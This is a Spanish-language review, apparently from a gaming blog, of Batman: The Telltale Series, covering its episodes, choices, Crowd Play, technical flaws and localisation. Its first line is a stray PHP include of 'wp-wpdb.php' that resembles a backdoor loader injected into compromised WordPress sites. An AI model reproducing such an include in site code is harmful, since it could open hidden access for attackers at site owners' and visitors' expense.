if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis Batman The Telltale Series – La Fortaleza de LeChuck

Análisis Batman The Telltale Series

Batman es uno de los personajes más prolíficos en adaptaciones a los videojuegos, desde que allá por el lejano 1986 realizara su primera incursión a lomos de un Spectrum. 30 años -y más de una treintena de apariciones en títulos- después, TellTale Games se apunta a dar su propia visión del universo del murciélago enmascarado, vigilante de la oscura Gotham. Tras hacernos disfrutar con historias como las dos temporadas de The Walking Dead (a la espera de la tercera), The Wolf Among Us, Juego de Tronos, o Tales From The Borderlands, esperábamos con interés la llegada de tan icónico héroe a la fórmula habitual de la compañía. Y el resultado, tras hincarle el diente al primer episodio, es correcto… Pero debe progresar adecuadamente.

Batman The Telltale Series

No hay duda que TellTale encontró un esquema ganador dentro del terreno de las aventuras gráficas (o películas interactivas, según a quién se pregunte), y que lo está exprimiendo hasta la extenuación. El éxito arrollador de la primera temporada de The Walking Dead, con varios premios de Juego del Año, los catapultó al estrellato, gracias al cual se han labrado una reputación de buenos narradores de historias, haciendo honor al propio nombre de la empresa. Y gracias al cual han continuado adquiriendo licencias jugosas con las que seguir acumulando alabanzas en general, con algún tropezón ocasional con unos bloques poco inspirados (Minecraft: Story Mode). Aún así, menos inspirado fué su Parque Jurásico.

Habla mucho y muy bien del universo y la mitología creada alrededor de Batsy que, a pesar de la gran cantidad de cómics, series y películas dedicadas al Caballero Oscuro, sea un personaje que no da muestras de cansancio para el gran público. De hecho, existen tantas visiones diferentes del personaje, que da igual que venga un Frank Miller a presentar un Batman crepuscular y más loco que sus propios villanos, que venga Rocksteady a revolucionar el mito y la jugabilidad en los videojuegos, o que venga un Zack Snyder a destrozar la leyenda, pasándose sus creencias por el forro. Batman es la noche. La noche es Batman. Y Batman mola incluso cuando baila Batusi, algo que para cualquier otro mortal sería vergonzante; pero no para Batman.

Hay que ser muy duro para salir con dignidad de esta.

Es por eso que esperamos mucho de TellTale a la hora de narrar una GRAN historia sobre el mejor detective del mundo, y para empezar se han arriesgado situando el contexto en un punto bastante inicial en las andanzas del murciélago de DC. Los reboots y reinicios de sagas no suelen funcionar, y más cuando éstas son ya parte de la cultura popular, porque al final el público se cansa de lo que ya conoce… Y ya veremos cuántas veces más hace falta que muera el pobre tío Ben para que los estudios cinematográficos se den cuenta.

En el momento que se inicia el primer episodio encarnamos al multimillonario Bruce Wayne, formando tándem con un joven y apuesto (todavía) Harvey Dent: Fiscal impoluto del distrito, aspirante a la alcaldía. En el traje del alter ego del justiciero, enseguida nos veremos envueltos en una trama política y mafiosa, donde conoceremos a Carmine Falcone, capo mafioso y personaje importante en historias como “Batman: Año Uno”, o en “El Largo Halloween”, dos de los cómics en los que se basa -mucho más allá del homenaje- esta adaptación. Por suerte, y hacia el final de este episodio primero, veremos que la adaptación diferirá ligeramente de los derroteros de El Largo Halloween, ya que durante este primer capítulo, por momentos temía que iba a ser un calco de esta mini-serie (que por cierto, si les gusta el personaje les recomiendo ávidamente que lean).

A pesar que el juego tiene las típicas escenas de acción, cuajadas de los Quick Time Events clásicos de TellTale, según los desarrolladores una de las aportaciones de este Batman es que veremos más de lo habitual a Bruce Wayne. Y en este primer episodio ciertamente manejamos más tiempo al playboy de día, que al vigilante nocturno. Eso no es malo, y de hecho el sistema de decisiones habitual tiene más lógica en las decisiones que podemos tomar como Wayne, que cuando decidimos si partirle un brazo o no a un matón aleatorio. Como Bruce Wayne, podemos elegir en las conversaciones si ser un filántropo bondadoso, un estúpido snob, o un cobarde, dándole la vertiente que más nos parezca que deba tener. Como Batman, además de reservarle las escenas de acción, tendremos momentos de ejercer la famosa capacidad detectivesca, aunque de una manera muy simple. Demasiado. En este episodio hay una secuencia para hacer uso de dicha capacidad, con reminiscencias a las escenas del mismo tipo en la saga Arkham, pero consistentes en algo tan sencillo como unir puntos, como en un pasatiempo infantil. Muy desaprovechado.

Batman The Telltale Series
Decisiones, decisiones…

Eso sí, como buen primer episodio, el juego nos va a presentar un carrusel de personajes, todos míticos y conocidos de Gotham. Y alguno con algún rediseño curioso. La historia planta sus cimientos y a partir de aquí, debe despegar en siguientes episodios. Y por supuesto no puede faltar el cliffhanger final, para hacernos pensar que de aquí iremos hacia arriba y, claro, dejarnos con ganas de más.

Como conclusión, nos hemos encontrado con una visión oscura, y a la vez muy basada en el factor humano del personaje, y que promete -quizás- dejarnos moldearlo a nuestro gusto. Mención aparte merece el nuevo sistema ‘Crowd Play’. Este sistema permite jugar a este título en “Multijugador”: Con un código pueden jugar tantas personas como se quiera a la vez (se recomienda máximo doce) desde un dispositivo con navegador (tablet, PC, móvil, smart TV…). Y a la hora de elegir la frase que decir, o la decisión que tomar se realiza por votación entre los que están en el streaming. Es un formato que parece muy orientado a plataformas tipo Twitch, o simplemente si queremos jugarlo y comentarlo con amigos, aunque no deja de ser una curiosidad más que otra cosa.

Batman The Telltale Series
Alfred es un poco plasta, pero siempre se puede confiar en él

Lo que no puedo pasar por alto es que, a pesar de la cantidad de juegos que lleva TellTale a sus espaldas, aún siguen teniendo problemas con las animaciones, muy poco fluidas en ocasiones. Además la versión para PC, que es la jugada para este análisis, sufre de bajones de framerates que no tienen excusa, incluso en equipos que mueven The Witcher 3 sin problemas. Otro aspecto a comentar, que a priori parece positivo aunque puede tornarse extraño, es que por fin nos llega un juego de TellTale con subtítulos en castellano. Aunque se ha optado por utilizar castellano neutro, con lo que en vez de Catwoman, por ejemplo, tenemos a Gatúbela, para regocijo de nuestros amigos latinos. Por desgracia esto lleva a diálogos (pocos, por suerte) que parecen patrocinados por los momentos “Google Translator” de Final Fantasy VII. Como por ejemplo que Gordon le diga a Bruce Wayne que algo está “claro cristal” (en inglés “crystal clear”, que debería haberse localizado como “claro como el agua”, o al menos ”claro como el cristal”). Gazapos de traducción al margen, el sonido cumple de manera correcta, con una banda sonora muy adecuada para una producción de Batman, al cargo de Jared Emerson-Johnson, habitual compositor en la compañía. Con unos doblajes excelentes, como también nos tienen acostumbrados, y con Troy “estoy-en-todas-partes” Baker de protagonista, bordándolo una vez más.

Batman The Telltale Series
Pulsa ‘E’ para presentar tus respetos

Analizar una aventura episódica a partir de su primera entrega nunca es fácil. Ni justo. El enorme potencial que se le presupone a una historia de Batman en manos de TellTale tampoco le ayuda, y por eso este primer envite nos ha sabido a poco. El hecho de narrarnos de nuevo una historia que ya conocemos tampoco ayuda; ya sabemos como acabará el pobre Dent, por mucho que creamos en él. Sin embargo, en El Largo Halloween, por ponerlo otra vez de ejemplo, también sabíamos qué iba a pasar y sin embargo la historia se guardaba un as en la manga para dejarnos descolocados. Esa es la bala en la recámara de TellTale que parece vislumbrarse al final del primer episodio, con un cambio en la perspectiva del enfoque habitual en una historia del Caballero Oscuro.

batman-telltale-8

Tras acabar lo que tiene para ofrecer esta primera temporada -porque todo invita a pensar que habrá una segunda temporada, como mínimo- de este “Batman – The Telltale Series”, las sensaciones son ciertamente agridulces. Vamos por partes.

Prácticamente la totalidad del artículo que habla sobre el primer capítulo es válido para el resto, hasta el quinto y último. Incluso algún pasaje es bastante profético. Decía al principio del primer párrafo que tras el primer episodio, el juego debía progresar adecuadamente. La trama ha progresado, con un ritmo bastante irregular, dando lugar a una temporada más o menos interesante, pero me cuesta pensar que ésta haya culminado de manera ejemplar.

Esta incursión de Telltale en los orígenes del vigilante nocturno de Gotham merecía mucho más acierto. Ya no sólo por el peso de la expectativa, comentado en el análisis anterior: Es un juego poco valiente, y salvo un par de sorpresas bien medidas, (alguna previsible si conocemos la mitología del personaje, aunque otras francamente son bastante interesantes…), ésta es una historia que se puede jugar con el piloto automático puesto.

batman-telltale-9

En las escenas de acción, da igual si no acertamos, todo seguirá adelante excepto en momentos puntuales de game over, en los que simplemente se nos penaliza con volver a empezar esa escena desde el principio. Ningún “modo detective” en alguno de los episodios, que funcionan simplemente, como decíamos, uniendo puntos, suponen un reto en absoluto. Y las decisiones, siendo los puntales en los que el juego se apoya en todo su esplendor, como mucho pueden modificar el aspecto de algún personaje, o darle más fuerza a un villano por encima de otro en el último tramo.

Entre tanto claroscuro, aún así, hay elementos rescatables. La mejor aportación de este juego al universo Batman es darle una vuelta a la forma de ser de personajes clave en la trama original, aportando otro enfoque, y sobre todo permitir mayor presencia y lucirse al hombre embutido dentro del uniforme de cuero apretado. Y que el traje no tiene pezones. Aparte de eso, sí destacaría un buen par de cliffhangers, como el del final del episodio 3, que me hizo gritar como un loco a la pantalla, a sabiendas que aún tardaría un mes en saber cómo continuaría la trama tras ese giro de guión (mejor omito las palabras que salieron de mi boca). Y la introducción de un nuevo gran villano para la ocasión, que sí me parece un buen acierto, aunque, aviso para navegantes: Puede hacer rasgarse las vestiduras a los aficionados más puristas. Así que, incluso los puntos positivos que le veo al juego, pueden depender de lo fan-fatales acérrimos que seamos del personaje.

batman-telltale-10

El problema principal de este Batman, es que adolece del mismo mal que los últimos juegos de Telltale. La fórmula se repite una y otra vez desde el exitazo de The Walking Dead, y ya no es que muestre síntomas de cansancio, es que son muchas las voces que piden balones de oxígeno para dicha fórmula, o que busquen otras vías de narrar historias. Lo siguiente que nos llegará de esta compañía será, precisamente, la tercera temporada de The Walking Dead, juego más que presumiblemente continuista.

La sensación que me queda tras finiquitar esta -primera- temporada, es que el último gran juego de esta empresa fue Tales From The Borderlands. Con la misma fórmula, sí, pero con mucho más ritmo, chispa, alegría narrativa, y personajes carismáticos. Algo así es lo que esperaba para este Batman – The Telltale Series, que aprueba justito, y que sólo recomiendo a seguidores del Caballero Oscuro (y aún así a más de uno le chirriarán los elementos de cosecha propia), y sobre todo a quién disfrute con el estilo de contar historias que tiene Telltale Games… y no tenga el día demasiado exigente.